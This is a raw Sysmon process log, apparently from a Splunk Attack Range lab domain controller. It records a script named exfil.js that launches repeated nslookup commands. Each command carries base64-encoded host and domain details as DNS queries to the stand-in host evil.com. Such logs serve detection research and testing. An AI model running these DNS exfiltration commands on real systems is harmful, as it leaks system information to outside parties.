ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluOiBhdHRhY2tyYW5nZS5sb2NhbA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlesieai.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000067886Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:17:27.082{A8622C2F-5907-6078-1D0E-00000000AE01}6084C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5907-6078-1B0E-00000000AE01}5444C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nliwyzly.tmp 2>&1 154100x800000000000000067871Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:17:27.051{A8622C2F-5907-6078-1B0E-00000000AE01}5444C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nliwyzly.tmp 
2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58DF-6078-060E-00000000AE01}2824C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000067805Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:17:22.290{A8622C2F-5902-6078-1A0E-00000000AE01}1796C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A Q29tcHV0ZXJOYW1lOiBXSU4tREMtMjgx evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5902-6078-170E-00000000AE01}3868C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Q29tcHV0ZXJOYW1lOiBXSU4tREMtMjgx evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlanzw.tmp 2>&1 154100x800000000000000067794Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:17:22.273{A8622C2F-5902-6078-190E-00000000AE01}5368C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" 
service 154100x800000000000000067785Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:17:22.261{A8622C2F-5902-6078-170E-00000000AE01}3868C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Q29tcHV0ZXJOYW1lOiBXSU4tREMtMjgx evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlanzw.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000067764Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:17:20.555{A8622C2F-5900-6078-160E-00000000AE01}3208C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000067752Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:17:19.877{A8622C2F-58FF-6078-150E-00000000AE01}5756C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000067738Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:17:19.210{A8622C2F-58FF-6078-140E-00000000AE01}5316C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000067727Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:17:17.273{A8622C2F-58FD-6078-130E-00000000AE01}5996C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000067718Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
15:17:16.605{A8622C2F-58FC-6078-120E-00000000AE01}3220C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000067708Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:17:16.083{A8622C2F-58FC-6078-110E-00000000AE01}6580C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000067652Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:17:04.643{A8622C2F-58F0-6078-100E-00000000AE01}4832C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A Q29tcHV0ZXJOYW1lOiBXSU4tREMtMjgx evil.com 
C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-58F0-6078-0E0E-00000000AE01}6136C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Q29tcHV0ZXJOYW1lOiBXSU4tREMtMjgx evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrify.tmp 2>&1 154100x800000000000000067641Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:17:04.613{A8622C2F-58F0-6078-0E0E-00000000AE01}6136C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Q29tcHV0ZXJOYW1lOiBXSU4tREMtMjgx evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrify.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000067549Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:16:54.126{A8622C2F-58E6-6078-0C0E-00000000AE01}3500C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A Kioqd2luMzJfY29tcHV0ZXJzeXN0ZW0qKio= evil.com 
C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-58E6-6078-0A0E-00000000AE01}804C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Kioqd2luMzJfY29tcHV0ZXJzeXN0ZW0qKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlpghwu.tmp 2>&1 154100x800000000000000067538Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:16:54.095{A8622C2F-58E6-6078-0A0E-00000000AE01}804C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Kioqd2luMzJfY29tcHV0ZXJzeXN0ZW0qKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlpghwu.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58DF-6078-060E-00000000AE01}2824C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000067517Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:16:52.176{A8622C2F-58E4-6078-090E-00000000AE01}5804C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com 
C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-58E4-6078-070E-00000000AE01}5200C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvdxwq.tmp 2>&1 154100x800000000000000067506Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:16:52.147{A8622C2F-58E4-6078-070E-00000000AE01}5200C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvdxwq.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000067460Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:16:47.065{A8622C2F-58DF-6078-060E-00000000AE01}2824C:\Windows\System32\wscript.exe5.812.10240.16384Microsoft ® Windows Based Script HostMicrosoft ® Windows Script HostMicrosoft Corporationwscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=BEB231ACF04E40B506403920D4DD795A,SHA256=2548884526E8FBC5781F5B3B2972E9B20CC16DD86BDE93D2E888023F6919F5A2,IMPHASH=661A40859BC6D47752E9FC5E02C1862C{A8622C2F-58C0-6078-F60D-00000000AE01}6444C:\Windows\System32\cmd.exe"cmd.exe" 
/s /k pushd "C:\temp" 154100x800000000000000067401Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:16:34.506{A8622C2F-58D2-6078-050E-00000000AE01}4196C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-58D2-6078-030E-00000000AE01}5396C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzft.tmp 2>&1 154100x800000000000000067390Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:16:34.476{A8622C2F-58D2-6078-030E-00000000AE01}5396C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzft.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000067350Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:16:24.940{A8622C2F-58C8-6078-020E-00000000AE01}6336C:\Program Files\Notepad++\notepad++.exe7.95Notepad++ : a free (GPL) source code editorNotepad++Don HO 
don.h@free.frnotepad++.exe"C:\Program Files\Notepad++\notepad++.exe" "C:\temp\exfil.js"C:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=45833E3CFFD3716546665DCE0C343F2E,SHA256=5AEC02154C9A23F5D77B11853691449063AA0EF3988C4EB30048DEBBCEC8B947,IMPHASH=DE4B8987D5ADB218127887FA4130E9E8{A8622C2F-41CC-6078-CC03-00000000AE01}5260C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x800000000000000067327Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:16:22.269{A8622C2F-58C6-6078-010E-00000000AE01}5800C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000067319Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:16:22.081{A8622C2F-58C6-6078-000E-00000000AE01}7128C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A Kioqd2luMzJfY29tcHV0ZXJzeXN0ZW0qKio= evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-58C6-6078-FE0D-00000000AE01}6136C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A 
Kioqd2luMzJfY29tcHV0ZXJzeXN0ZW0qKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nluim.tmp 2>&1 154100x800000000000000067308Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:16:22.052{A8622C2F-58C6-6078-FE0D-00000000AE01}6136C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Kioqd2luMzJfY29tcHV0ZXJzeXN0ZW0qKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nluim.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000067293Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:16:20.559{A8622C2F-58C4-6078-FD0D-00000000AE01}5804C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000067275Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:16:19.982{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe5.812.10240.16384Microsoft ® Windows Based Script HostMicrosoft ® Windows Script HostMicrosoft Corporationwscript.exe"C:\Windows\System32\WScript.exe" 
"C:\Temp\exfil.js" C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=BEB231ACF04E40B506403920D4DD795A,SHA256=2548884526E8FBC5781F5B3B2972E9B20CC16DD86BDE93D2E888023F6919F5A2,IMPHASH=661A40859BC6D47752E9FC5E02C1862C{A8622C2F-58C0-6078-F60D-00000000AE01}6444C:\Windows\System32\cmd.exe"cmd.exe" /s /k pushd "C:\temp" 154100x800000000000000067261Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:16:19.882{A8622C2F-58C3-6078-FB0D-00000000AE01}6432C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000067250Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:16:19.200{A8622C2F-58C3-6078-FA0D-00000000AE01}1800C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000067236Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:16:17.431{A8622C2F-58C1-6078-F90D-00000000AE01}3788C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000067225Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:16:16.763{A8622C2F-58C0-6078-F80D-00000000AE01}1028C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000067200Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 